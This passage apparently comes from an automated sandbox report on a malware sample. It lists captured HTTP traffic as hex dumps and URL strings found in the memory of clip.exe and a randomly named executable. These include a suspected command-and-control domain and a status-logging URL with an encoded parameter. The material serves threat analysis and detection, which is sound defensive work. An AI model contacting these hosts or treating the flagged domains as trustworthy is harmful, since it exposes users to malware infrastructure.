20 63 6f 6e 74 65 6e 74 3d 22 65 6e 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 73 2e 63 73 73 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 6b 69 6e 67 5f 70 61 67 65 5f 68 65 61 64 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 6b 69 6e 67 5f 70 61 67 65 5f 68 65 61 64 65 72 5f 69 6e 6e 65 72 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 64 6f 6d 61 69 6e 74 65 63 68 6e 69 6b 2e 61 74 2f 64 61 74 61 2f 67 66 78 2f 64 74 5f 6c 6f 67 6f 5f 70 61 72 6b 69 6e 67 2e 70 6e 67 22 20 61 6c 74 3d 22 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b 2e 61 74 20 4c 6f 67 6f 22 20 2f 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 3e 54 68 65 20 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 21 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 70 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 3a 32 30 70 78 20 30 20 31 30 70 78 20 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 22 20 63 6c 61 73 73 3d 22 61 6c 69 67 6e 2d 63 65 6e 74 65 72 22 3e 41 6c 73 20 44 6f 6d 61 69 6e 69 6e 68 61 62 65 72 20 6b 26 6f 75 6d 6c 3b 6e 6e 65 6e 20 53 69 65 20 49 68 72 65 20 44 6f 6d 61 69 6e 73 20 6f 6e 6c 69 6e 65 20 76 65 72 77 61 6c 74 65 6e 2c
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 12 Aug 2024 03:16:03 GMTServer: Apache/2.4.61 (Debian)X-Powered-By: PHP/7.4.33Strict-Transport-Security: max-age=63072000; preloadConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 64 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 62 79 20 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b c2 ae 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 6c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 73 2e 63 73 73 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 6b 69 6e 67 5f 70 61 67 65 5f 68 65 61 64 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 6b 69 6e 67 5f 70 61 67 65 5f 68 65 61 64 65 72 5f 69 6e 6e 65 72 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 64 6f 6d 61 69 6e 74 65 63 68 6e 69 6b 2e 61 74 2f 64 61 74 61 2f 67 66 78 2f 64 74 5f 6c 6f 67 6f 5f 70 61 72 6b 69 6e 67 2e 70 6e 67 22 20 61 6c 74 3d 22 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b 2e 61 74 20 4c 6f 67 6f 22 20 2f 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 3e 54 68 65 20 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 21 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 70 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 3a 32 30 70 78 20 30 20 31 30 70 78 20 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 22 20 63 6c 61 73 73 3d 22 61 6c 69 67 6e 2d 63 65 6e 74 65 72 22 3e 41 6c 73 20 44 6f 6d 61 69 6e 69 6e 68 61 62 65 72 20 6b 26 6f 75 6d 6c 3b 6e 6e 65 6e 20 53 69 65 20 49 68 72 65 20 44 6f 6d 61 69 6e 73 20 6f 6e 6c 69 6e 65 20 76 65 72 77 61 6c 74 65 6e 2c
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 12 Aug 2024 03:16:23 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 33 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb ec 29 77 a8 82 d0 70 1d df 33 7d cf 75 3c 55 b7 74 75 1d 5f fa 22 50 6e a3 14 46 63 57 85 3d a5 30 d3 40 75 1c d9 28 49 d7 2d 89 5e a0 36 72 79 59 3e 43 8e 22 df b4 c3 10 b3 4c fa 3b 58 49 d6 7a 43 42 34 4c 86 3f ab cb 25 41 2a 84 c6 06 b2 ab ac 2b 06 37 6c d6 43 3b 70 86 51 d3 3a 56 3f ba 7e fe c2 b9 4b e7 d6 8f 59 47 b6 1c af e3 6f 99 51 20 ed fe 1a 37 b8 e8 cb 8e 68 88 8d 91 67 47 90 bf 52 bd 7a 7d e5 88 75 ec f2 e5 e6 31 ab 6e a5 83 a4 83 09 2c 0e cd 1b a5 f9 c3 54 ca d6 40 7a ce 86 0a 23 f3 dd b0 5c 2d a1 bd 0a 02 3f 38 64 87 9a 58 46 9f 30 b0 1b a5 e2 40 30 4c 66 e8 51 b4 c1 86 7e 66 b9 08 35 b0 1d 69 24 3c b4 6c b3 9d 8a f2 cd d4 1d 24 a3 a5 21 db f6 3b e3 0c dc 6d 63 08 5b 09 fd af 45 e6 6b a5 80 e5 32 86 ee e4 53 ab dd 6d b9 4e b7 17 01 0f 34 96 0a 8a e3 70 e3 56 2b ad a0 21 a7 4a f4 e8 29 ec 3b ce e6 c2 ae 86 e7 47 24 52 a4 ae 60 a2 f8 eb 78 2f 7e 14 ef c4 8f 45 fc 6d 7c 27 79 1f 1f ef c5 bb c9 07 c9 0d 7c de c5 ef 5e bc 1d df a1 ea ed 25 af 1d 0e 57 ea 70 48 ed ba 6d 78 82 d7 cf b0 da 8b a2 61 78 d6 b2 e0 7f 26 3c 58 3b 83 e7 6f f8 ae eb 6f 09 cf f7 87 0a 28 c1 07 f8 01 d0 a2 02 e0 59 06 5d f2 eb 56 1b 8e df 87 30 7f a3 d9 cd e4 fd e4 66 dd 92 cd ba 85 75 34 eb 33 8b e9 aa 56 2b 75 76 63 2b 90 43 b8 64 a6 e0 d9 f2 16 fb 62 0b be 00 66 58 d8 88 cd d2 f3 c3 08 3c 62 84 91 8c 1c 1b 06 98 99 75 4a d7 46 3a 3f d9 69 79 a2 8d 19 8b 18 4c 0d a5 c5 d4 d1 5b 6e d6 87 8b bb 77 94 06 32 bc f5 d9 cd 55 6f 07 cd 78 57 5b 2c 7e 42 a6 8c 9f b0 79 1f ec 33 e8 94 d6 87 8b 56 de 1e 45 91 ef 85 99 ca b1 f4 02 0e 74 25 a4 d4 1f 60 07 d7 0f 5a 6c 68 e5 d9 84 b6 b4 22 74 de 53 2d 40 60 20 5d b6 47 aa d6 bc 7f ae c2 b4 3d db 06 cc 5c 18 62 28 3b 1d 58 aa e5 12 78 66 c1 47 34 ad 01 68 6d f5 7c 27 b4 56 ed 9e b2 fb 8d a5 0e 87 8b 05 2c be 24 07 c3 15 74 6b 85 fe 28 b0 55 23 93 82 f8 b9 d4 fc 0d 0d 44 78 14 c5 25 93 fb 14 97 c0 04 5e f0 ca 83 97 d4 f1 07 d2 c9 69 3e 73 9d 82 f4 ba 81 e5 a9 2d 6b 75 14 0d 32 c9 16 2d 80 9a 50 b0 19 0d 32 e1 97 a8 c8 c6 c2 a4 d3 f5 1a 21 d4 e5 75 5a 18 ee e0 b5 c6 ff 00 3c fe 1b ef 88 e4 a3 78 2f f9 24 b9 29 e2 fb 19 41 1c 2d f8 64 38 94 de 1
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 12 Aug 2024 03:16:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 33 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb ec 29 77 a8 82 d0 70 1d df 33 7d cf 75 3c 55 b7 74 75 1d 5f fa 22 50 6e a3 14 46 63 57 85 3d a5 30 d3 40 75 1c d9 28 49 d7 2d 89 5e a0 36 72 79 59 3e 43 8e 22 df b4 c3 10 b3 4c fa 3b 58 49 d6 7a 43 42 34 4c 86 3f ab cb 25 41 2a 84 c6 06 b2 ab ac 2b 06 37 6c d6 43 3b 70 86 51 d3 3a 56 3f ba 7e fe c2 b9 4b e7 d6 8f 59 47 b6 1c af e3 6f 99 51 20 ed fe 1a 37 b8 e8 cb 8e 68 88 8d 91 67 47 90 bf 52 bd 7a 7d e5 88 75 ec f2 e5 e6 31 ab 6e a5 83 a4 83 09 2c 0e cd 1b a5 f9 c3 54 ca d6 40 7a ce 86 0a 23 f3 dd b0 5c 2d a1 bd 0a 02 3f 38 64 87 9a 58 46 9f 30 b0 1b a5 e2 40 30 4c 66 e8 51 b4 c1 86 7e 66 b9 08 35 b0 1d 69 24 3c b4 6c b3 9d 8a f2 cd d4 1d 24 a3 a5 21 db f6 3b e3 0c dc 6d 63 08 5b 09 fd af 45 e6 6b a5 80 e5 32 86 ee e4 53 ab dd 6d b9 4e b7 17 01 0f 34 96 0a 8a e3 70 e3 56 2b ad a0 21 a7 4a f4 e8 29 ec 3b ce e6 c2 ae 86 e7 47 24 52 a4 ae 60 a2 f8 eb 78 2f 7e 14 ef c4 8f 45 fc 6d 7c 27 79 1f 1f ef c5 bb c9 07 c9 0d 7c de c5 ef 5e bc 1d df a1 ea ed 25 af 1d 0e 57 ea 70 48 ed ba 6d 78 82 d7 cf b0 da 8b a2 61 78 d6 b2 e0 7f 26 3c 58 3b 83 e7 6f f8 ae eb 6f 09 cf f7 87 0a 28 c1 07 f8 01 d0 a2 02 e0 59 06 5d f2 eb 56 1b 8e df 87 30 7f a3 d9 cd e4 fd e4 66 dd 92 cd ba 85 75 34 eb 33 8b e9 aa 56 2b 75 76 63 2b 90 43 b8 64 a6 e0 d9 f2 16 fb 62 0b be 00 66 58 d8 88 cd d2 f3 c3 08 3c 62 84 91 8c 1c 1b 06 98 99 75 4a d7 46 3a 3f d9 69 79 a2 8d 19 8b 18 4c 0d a5 c5 d4 d1 5b 6e d6 87 8b bb 77 94 06 32 bc f5 d9 cd 55 6f 07 cd 78 57 5b 2c 7e 42 a6 8c 9f b0 79 1f ec 33 e8 94 d6 87 8b 56 de 1e 45 91 ef 85 99 ca b1 f4 02 0e 74 25 a4 d4 1f 60 07 d7 0f 5a 6c 68 e5 d9 84 b6 b4 22 74 de 53 2d 40 60 20 5d b6 47 aa d6 bc 7f ae c2 b4 3d db 06 cc 5c 18 62 28 3b 1d 58 aa e5 12 78 66 c1 47 34 ad 01 68 6d f5 7c 27 b4 56 ed 9e b2 fb 8d a5 0e 87 8b 05 2c be 24 07 c3 15 74 6b 85 fe 28 b0 55 23 93 82 f8 b9 d4 fc 0d 0d 44 78 14 c5 25 93 fb 14 97 c0 04 5e f0 ca 83 97 d4 f1 07 d2 c9 69 3e 73 9d 82 f4 ba 81 e5 a9 2d 6b 75 14 0d 32 c9 16 2d 80 9a 50 b0 19 0d 32 e1 97 a8 c8 c6 c2 a4 d3 f5 1a 21 d4 e5 75 5a 18 ee e0 b5 c6 ff 00 3c fe 1b ef 88 e4 a3 78 2f f9 24 b9 29 e2 fb 19 41 1c 2d f8 64 38 94 de 1
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 12 Aug 2024 03:16:28 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 33 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb ec 29 77 a8 82 d0 70 1d df 33 7d cf 75 3c 55 b7 74 75 1d 5f fa 22 50 6e a3 14 46 63 57 85 3d a5 30 d3 40 75 1c d9 28 49 d7 2d 89 5e a0 36 72 79 59 3e 43 8e 22 df b4 c3 10 b3 4c fa 3b 58 49 d6 7a 43 42 34 4c 86 3f ab cb 25 41 2a 84 c6 06 b2 ab ac 2b 06 37 6c d6 43 3b 70 86 51 d3 3a 56 3f ba 7e fe c2 b9 4b e7 d6 8f 59 47 b6 1c af e3 6f 99 51 20 ed fe 1a 37 b8 e8 cb 8e 68 88 8d 91 67 47 90 bf 52 bd 7a 7d e5 88 75 ec f2 e5 e6 31 ab 6e a5 83 a4 83 09 2c 0e cd 1b a5 f9 c3 54 ca d6 40 7a ce 86 0a 23 f3 dd b0 5c 2d a1 bd 0a 02 3f 38 64 87 9a 58 46 9f 30 b0 1b a5 e2 40 30 4c 66 e8 51 b4 c1 86 7e 66 b9 08 35 b0 1d 69 24 3c b4 6c b3 9d 8a f2 cd d4 1d 24 a3 a5 21 db f6 3b e3 0c dc 6d 63 08 5b 09 fd af 45 e6 6b a5 80 e5 32 86 ee e4 53 ab dd 6d b9 4e b7 17 01 0f 34 96 0a 8a e3 70 e3 56 2b ad a0 21 a7 4a f4 e8 29 ec 3b ce e6 c2 ae 86 e7 47 24 52 a4 ae 60 a2 f8 eb 78 2f 7e 14 ef c4 8f 45 fc 6d 7c 27 79 1f 1f ef c5 bb c9 07 c9 0d 7c de c5 ef 5e bc 1d df a1 ea ed 25 af 1d 0e 57 ea 70 48 ed ba 6d 78 82 d7 cf b0 da 8b a2 61 78 d6 b2 e0 7f 26 3c 58 3b 83 e7 6f f8 ae eb 6f 09 cf f7 87 0a 28 c1 07 f8 01 d0 a2 02 e0 59 06 5d f2 eb 56 1b 8e df 87 30 7f a3 d9 cd e4 fd e4 66 dd 92 cd ba 85 75 34 eb 33 8b e9 aa 56 2b 75 76 63 2b 90 43 b8 64 a6 e0 d9 f2 16 fb 62 0b be 00 66 58 d8 88 cd d2 f3 c3 08 3c 62 84 91 8c 1c 1b 06 98 99 75 4a d7 46 3a 3f d9 69 79 a2 8d 19 8b 18 4c 0d a5 c5 d4 d1 5b 6e d6 87 8b bb 77 94 06 32 bc f5 d9 cd 55 6f 07 cd 78 57 5b 2c 7e 42 a6 8c 9f b0 79 1f ec 33 e8 94 d6 87 8b 56 de 1e 45 91 ef 85 99 ca b1 f4 02 0e 74 25 a4 d4 1f 60 07 d7 0f 5a 6c 68 e5 d9 84 b6 b4 22 74 de 53 2d 40 60 20 5d b6 47 aa d6 bc 7f ae c2 b4 3d db 06 cc 5c 18 62 28 3b 1d 58 aa e5 12 78 66 c1 47 34 ad 01 68 6d f5 7c 27 b4 56 ed 9e b2 fb 8d a5 0e 87 8b 05 2c be 24 07 c3 15 74 6b 85 fe 28 b0 55 23 93 82 f8 b9 d4 fc 0d 0d 44 78 14 c5 25 93 fb 14 97 c0 04 5e f0 ca 83 97 d4 f1 07 d2 c9 69 3e 73 9d 82 f4 ba 81 e5 a9 2d 6b 75 14 0d 32 c9 16 2d 80 9a 50 b0 19 0d 32 e1 97 a8 c8 c6 c2 a4 d3 f5 1a 21 d4 e5 75 5a 18 ee e0 b5 c6 ff 00 3c fe 1b ef 88 e4 a3 78 2f f9 24 b9 29 e2 fb 19 41 1c 2d f8 64 38 94 de 1
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 12 Aug 2024 03:16:30 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 39 38 61 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 68 65 6c 70 65 72 73 2d 6c 69 6f 6e 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b
            Source: clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut
            Source: clip.exe, 00000003.00000002.4134771184.000000000582C000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000003CDC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.bfiworkerscomp.com/px.js?ch=1
            Source: clip.exe, 00000003.00000002.4134771184.000000000582C000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000003CDC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.bfiworkerscomp.com/px.js?ch=2
            Source: clip.exe, 00000003.00000002.4134771184.000000000582C000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000003CDC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.bfiworkerscomp.com/sk-logabpstatus.php?a=RVFsMXVZQ01zWVBtemVpNk84WGZGRFNKclVyQWVYYVJiaVZY
            Source: QAjjirwAoAEExvw.exe, 00000007.00000002.4135732258.0000000005746000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.dmtxwuatbz.cc
            Source: QAjjirwAoAEExvw.exe, 00000007.00000002.4135732258.0000000005746000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.dmtxwuatbz.cc/lfkn/
            Source: clip.exe, 00000003.00000002.4134771184.0000000006198000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004648000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.domaintechnik.at/data/gfx/dt_logo_parking.png
            Source: clip.exe, 00000003.00000003.2060620422.00000000078BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: clip.exe, 00000003.00000003.2060620422.00000000078BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: clip.exe, 00000003.00000002.4134771184.0000000006006000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.00000000044B6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js
            Source: clip.exe, 00000003.00000002.4134771184.0000000006006000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.00000000044B6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: clip.exe, 00000003.00000002.4134771184.0000000006006000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.00000000044B6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css
            Source: clip.exe, 00000003.00000003.2060620422.00000000078BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: clip.exe, 00000003.00000003.2060620422.00000000078BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
